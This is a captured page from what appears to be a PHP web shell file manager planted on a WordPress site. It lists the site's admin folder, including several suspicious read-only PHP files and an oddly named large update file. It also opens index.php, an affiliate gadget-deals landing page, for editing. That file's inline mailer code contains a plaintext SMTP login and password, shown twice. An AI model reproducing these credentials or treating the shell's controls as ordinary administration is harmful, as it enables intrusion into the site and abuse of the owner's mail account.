📁
SKYSHELL MANAGER
PHP v8.1.29
Create
Create
Path:
root
/
var
/
www
/
html
/
wxwpsite
/
fungiftdeals
/
wp-admin
/
Name
Size
Perm
Actions
📁
css
-
0755
🗑️
🏷️
🔒
📁
images
-
0755
🗑️
🏷️
🔒
📁
includes
-
0755
🗑️
🏷️
🔒
📁
js
-
0755
🗑️
🏷️
🔒
📁
maint
-
0755
🗑️
🏷️
🔒
📁
network
-
0755
🗑️
🏷️
🔒
📁
user
-
0755
🗑️
🏷️
🔒
📄
about.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
admin-footer.php
2.75 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
admin.php
12.63 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
async-upload.php
5.47 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
authorize-application.php
10.09 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
comment.php
11.37 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
custom-header.php
0.49 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
customize.php
11.21 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
edit-form-blocks.php
14.73 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
edit.php
19.48 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
export-personal-data.php
7.75 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
font-library.php
1.01 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
home.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
index.php
7.68 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
media-upload.php
3.58 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
menu-header.php
9.82 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
network.php
5.39 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
press-this.php
2.41 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
privacy.php
2.83 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
setup-config.php
17.52 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
themes.phpwp-update.php
114.83 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
update.php
12.76 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
user-edit.php
40.35 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
widgets-form-blocks.php
5.12 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-mail.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
Edit: index.php
<!DOCTYPE html> <html lang="en"> <head> <!-- basic --> <meta charset="utf-8"> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <!-- mobile metas --> <meta name="viewport" content="width=device-width, initial-scale=1"> <meta name="viewport" content="initial-scale=1, maximum-scale=1"> <!-- site metas --> <title>Royal Gadget House</title> <meta name="keywords" content=""> <meta name="description" content=""> <meta name="author" content=""> <!-- bootstrap css --> <link rel="stylesheet" href="css/bootstrap.min.css"> <!-- style css --> <link rel="stylesheet" href="css/style.css"> <!-- Responsive--> <link rel="stylesheet" href="css/responsive.css"> <!-- fevicon --> <link rel="icon" href="images/fav.png" type="images/png" /> <!-- Scrollbar Custom CSS --> <link rel="stylesheet" href="css/jquery.mCustomScrollbar.min.css"> <!-- Tweaks for older IEs--> <!--[if lt IE 9]> <script src="https://oss.maxcdn.com/html5shiv/3.7.3/html5shiv.min.js"></script> <script src="https://oss.maxcdn.com/respond/1.4.2/respond.min.js"></script><![endif]--> <script src="https://www.google.com/recaptcha/api.js" async defer></script> <script type="text/javascript"> var onloadCallback = function() { grecaptcha.render('html_element', { 'sitekey' : '6LdIGjcaAAAAAAK66KIkYg0gSMRK3jh0UdG-V5Zh' }); }; </script> </head> <!-- body --> <body class="main-layout"> <!-- header --> <header> <!-- header inner --> <div class="container-fluid"> <div class="row"> <div class="col-lg-3 logo_section"> <div class="full"> <div class="center-desk"> <div class="logo"> <a href="index.php"><img src="images/logo.png" alt="Royal Gadget House"></a> </div> </div> </div> </div> <div class="col-lg-9"> <div class="menu-area"> <div class="limit-box"> <nav class="main-menu"> <ul class="menu-area-main"> <li> <a href="index.php">HOME</a> </li> <li> <a href="blog1.php">TRENDING</a> </li> <li> <a href="blog3.php">COOL GADGETS</a> </li> <li> <a href="blog2.php">TECHNOLOGY</a> </li> <li> <a href="contact.php">CONTACT US</a> </li> <li class="active"> <a href="subscribe.php">QUICK UPDATES</a> </li> </ul> </nav> </div> </div> </div> </div> </div> <!-- end header inner --> </header> <!-- end header --> <!-- revolution slider --> <div class="banner-slider"> <div class="container-fluid"> <div class="row"> <div class="col-md-7"> <div id="slider_main" class="carousel slide" data-ride="carousel"> <!-- The slideshow --> <div class="carousel-inner"> <div class="carousel-item active"> <img src="images/slide1.jpg" alt="Royal Gadget House" /> </div> <div class="carousel-item"> <img src="images/slide2.jpg" alt="Royal Gadget House" /> </div> </div> <!-- Left and right controls --> <a class="carousel-control-prev" href="#slider_main" data-slide="prev"> <i class="fa fa-angle-left" aria-hidden="true"></i> </a> <a class="carousel-control-next" href="#slider_main" data-slide="next"> <i class="fa fa-angle-right" aria-hidden="true"></i> </a> </div> </div> <div class="col-md-5"> <div class="full slider_cont_section"> <h5><span class="orange_color">The Trend</span></h5> <h4>Insanely Cool Gadgets That Are Going to Sell Out</h4> <p style="color:#212222;">Tired of thinking about Christmas Gifts Ideas for families or friends ? Well, we at Gadgets Laboratory are looking out for products that have great value and can help with making your everyday life simpler!</p> <div class="button_section"> <a href="blog1.php">Read More</a> </div> </div> </div> </div> </div> </div> <!-- end revolution slider --> <!-- section --> <div class="section layout_padding"> <div class="container"> <div class="row"> <div class="col-md-12"> <div class="heading"> <h3>Recent <span class="orange_color">Updates</span></h3> </div> </div> </div> <div class="row"> <div class="col-md-6"> <img src="images/sl1.jpg" alt="Royal Gadget House" /> </div> <div class="col-md-6"> <div class="full blog_cont"> <h4><span class="orange_color">Amazingly Cool</span> Gadgets That Are Great As Holiday Gifts</span></h4> <p>It's coming up on that time again, so we can hopefully have a great holiday and forget about the current situation. Have you started thinking about what you are going to get everyone for the holidays? Well, we at Just Gismos are looking out for products that not only are great value but can help with making your everyday life simpler!</p><br> <div class="button_section"> <a href="blog2.php" style="width:auto; padding: 0px 15px 0px 15px;">Discover more blog posts »</a> </div> </div> </div> </div> <div class="row margin_top_30"> <div class="col-md-6"> <img src="images/sl2.jpg" alt="Royal Gadget House" /> </div> <div class="col-md-6"> <div class="full blog_cont"> <h4><span class="orange_color">Get Deep Discounts</span> Today On These Great Gifts</h4> <p>Tired of thinking about Christmas Gifts Ideas for families or friends ? Well, we at Gadgets Laboratory are looking out for products that have great value and can help with making your everyday life simpler!</p> <p>We have done all the hard work for you and put together a list of the hottest selling gadgets you probably didn't know about. Add them to your wishlist, for yourself or maybe that hard-to-buy person on your shopping list. There is a product for everyone, and most of the gadgets are under $60! Alot of these are selling like hotcakes, so make a move quickly to get your discounts before they sell out.</p><br> <div class="button_section"> <a href="blog3.php" style="width:auto; padding: 0px 15px 0px 15px;">Discover more blog posts »</a> </div> </div> </div> </div> <div class="row margin_top_30"> <div class="col-md-6"> <img src="images/sl3.jpg" alt="Royal Gadget House" /> </div> <div class="col-md-6"> <div class="full blog_cont"> <h4><span class="orange_color">Problem Solving Products</span> You Won't Be Able To Do Without In 2021</h4> <p>At Curious Finds, our sole purpose is to scour the internet looking for unique and useful products we think our readers would want or need. As we've accumulated more and more products, we've since seen that many of our finds are not only great gifts or unique and useful products, but many also solve a LOT of everyday, pesky problems that we experience in our lives. So we decided to give our readers a list of our favorite problem solving products in 2020.</p> <p>Most of our problem solving finds are under $60. They are proven, battle tested products that work like a charm. Hopefully one or more of these can help you live a more problem free life for the rest of 2020 and beyond. We hope you can turn some of life's lemons into lemonade with these amazing problem solvers. That said, enjoy our list, come back often and tell a friend!</p><br> </div> </div> </div> <div class="row margin_top_30"> <div class="col-md-6"> <img src="images/sl4.jpg" alt="Royal Gadget House" /> </div> <div class="col-md-6"> <div class="full blog_cont"> <h4><span class="orange_color">Peeps:</span> The Perfect Gadget For Anyone With Glasses</h4> <p>With over 1.5 million sold, this is a must have for everyone with glasses. Designed specifically for cleaning eyeglasses, sunglasses and reading glasses, Peeps is the world's safest and most tested lens cleaning technology in the world. Peeps groundbreaking invisible carbon microfiber formula keep your glasses as clean as the day you bought them, at all times.</p> <p>This is actually the same lens cleaning technology used by NASA.</p> <p>Peeps™ has been lab tested, and it lasts for over 500 individual lens cleans. It cleans lenses 4x faster than pads. So not only do you save money, you save time! Click here or the button below to get Peeps. You'll never see the same way again!</p><br> <div class="button_section"> <a href="https://getcarbonklean.io/offer-03/" style="width:auto; padding: 0px 15px 0px 15px;">Get Peeps Today</a> </div> </div> </div> </div> <div class="row margin_top_30"> <div class="col-md-12"> <div class="full blog_cont"> <h4><span class="orange_color">PhotoStick -</span> World's Only Instant Photo Backup</h4> <p>The PhotoStick is a clever new gadget designed to protect your photo and video memories. If you store your photos and videos on your computer you know the risks that come with computer crashes, viruses, and power surges. You could have your digital memories wiped out in seconds. The PhotoStick is one of the most in-demand gadgets this fall (selling over 1,000 units per day).</p> <p>This makes a perfect gift for anyone who wants to safeguard their digital memories and doesn’t trust “the cloud”. Using the PhotoStick is easy.</p><br> <p>1. Connect this small thumb sized drive to your PC or Mac.</p> <p>2. Press ‘Go’ and it will automatically sync your pictures and videos into the stick.</p><br> <div class="button_section"> <a href="https://getphotostick.io/offer-01/" style="width:auto; padding: 0px 15px 0px 15px;">Shop PhotoStick Today! »</a> </div> </div> </div> </div> </div> </div> <!-- end section --> <!-- footer --> <footer> <div class="container"> <div class="row"> <div class="col-lg-8 col-md-6"> <h3 style="color:#ffff;font-weight: 500;font-size: 24px;">What We Do</h3> <p style="color:#ffff;"> Our royalgadgethouse.in is designed to help users make confident decisions online, this website contains information about a wide range of products and services. Certain details, including but not limited to prices and special offers, are provided to us directly from our partners and are dynamic and subject to change at any time without prior notice. Though based on extensive research, the information we share does not constitute legal or professional advice or forecast, and should not be treated as such. Reproduction of this website is strictly prohibited.</p><br> <p><a style="color:#ffff;font-size:10px;" href="privacy.php">Privacy Policy</a> | <a style="color:#ffff;font-size:10px;" href="terms.php">Terms Of Service</a> | <a style="color:#ffff;font-size:10px;" href="contact.php">Contact Us</a> | <a style="color:#ffff;font-size:10px;" href="subscribe.php">Subscribe</a> | <a style="color:#ffff;font-size:10px;" href="unsubscribe.php">Unsubscribe</a></p> </div> <div class="col-lg-4 col-md-6"> <div class="footer_links"> <h3>Our Newsletter</h3> <p style="color:#ffff;">Subscribe to get latest gadgets deals.</p><br> <form action="#" method="post"> <fieldset> <div class="field"> <input type="text" name="name" placeholder="Your Name" required="" /> </div> <div class="field"> <input type="email" name="email" placeholder="Email" required="" /> </div> <div class="field"> <div class="g-recaptcha" data-sitekey="6LdIGjcaAAAAAAK66KIkYg0gSMRK3jh0UdG-V5Zh"></div> </div> <div class="field"> <div class="center"> <button type="submit" name="Submit" class="reply_bt">Subscribe Us</button> </div> </div> </fieldset> </form> <script src="https://www.google.com/recaptcha/api.js?onload=onloadCallback&render=explicit" async defer> </script> <?php //subscribe form if (isset($_POST['Submit'])){ $email=$_REQUEST['email']; if (($email=="")||($email=="")) { echo "All fields are required, please fill the form again."; } else{ include_once('/var/www/html/wxwpsite/royalgadgethouse/PHPMailer/PHPMailerAutoload.php'); //PHPMailer Object $mail = new PHPMailer; //$mail->SMTPDebug = 3; $mail->Host = 'smtp.yandex.com'; // SMTP server $mail->Port = 465; // optional // used only when SMTP requires authentication $mail->SMTPAuth = true; $mail->Username = 'contact@royalgadgethouse.in'; $mail->Password = '5pU-3_8$9$}%<ke['; $mail->SMTPSecure = 'ssl'; $mail->IsSMTP(); //From email address and name //$mail->From = "vinothkumar@webberax.com"; //$mail->FromName = "vinoth"; $mail->setFrom('contact@royalgadgethouse.in', 'Royal Gadget House'); //To address and name $mail->addAddress($email, $name, $message); //$mail->addAddress('vinothkumar@webberax.com', 'hello'); //$mail->addAddress("recepient1@example.com"); //Recipient name is optional //Address to which recipient will reply $mail->addReplyTo("contact@royalgadgethouse.in", "Reply"); //CC and BCC //$mail->addCC("vinothkumar@gmail.com"); //$mail->addBCC("bcc@example.com"); //Send HTML or Plain Text email $mail->isHTML(true); $mail->Subject = "Royal Gadget House [Success!]"; $mail->Body = "<p>This message confirms that you have subscribed from the Royal Gadget House newsletter.</p></br> <p>Thank you!</p></br> <i>This e-mail was sent from a subscribe form on (http://royalgadgethouse.in)</i>"; $mail->AltBody = "This is the plain text version of the email content"; if(!$mail->send()) { echo "Thanks for subscribing check sometimes later."; } else { echo "Thanks for subscribing to our service."; } //PHPMailer Object $mail2 = new PHPMailer; //$mail->SMTPDebug = 3; $mail2->Host = 'smtp.yandex.com'; // SMTP server $mail2->Port = 465; // optional // used only when SMTP requires authentication $mail2->SMTPAuth = true; $mail2->Username = 'contact@royalgadgethouse.in'; $mail2->Password = '5pU-3_8$9$}%<ke['; $mail2->SMTPSecure = 'ssl'; $mail2->IsSMTP(); $mail2->setFrom('contact@royalgadgethouse.in', 'Royal Gadget House'); $mail2->addAddress('contact@royalgadgethouse.in', 'Royal Gadget House'); $mail2->isHTML(true); $mail2->Subject = "Contact Details"; $mail2->Body = "<strong>Following user has been submitted subscribe details on your website <strong><br> Name : $name<br> Email : $email<br> Message: $message<br>"; $mail2->send(); } } ?> </div> </div> </div> </div> </footer> <div class="cpy"> <div class="container"> <div class="row"> <div class="col-md-12"> <p style="font-size:12px;">Copyright © 2025 Royalgadgethouse.in</p> </div> </div> </div> </div> <!-- end footer --> <!-- Javascript files--> <script src="js/jquery.min.js"></script> <script src="js/popper.min.js"></script> <script src="js/bootstrap.bundle.min.js"></script> <script src="js/jquery-3.0.0.min.js"></script> <script src="js/plugin.js"></script> <!-- Scrollbar Js Files --> <script src="js/jquery.mCustomScrollbar.concat.min.js"></script> <script src="js/custom.js"></script> <script id="ulp-remote" src="https://espro49.loc/web-pop-form/content/plugins/web-pop-forms/js/remote.min.js?ver=6.31" data-handler="https://app15.easysendyapp.com/web-pop-form/ajax.php"></script> </body> </html>
Save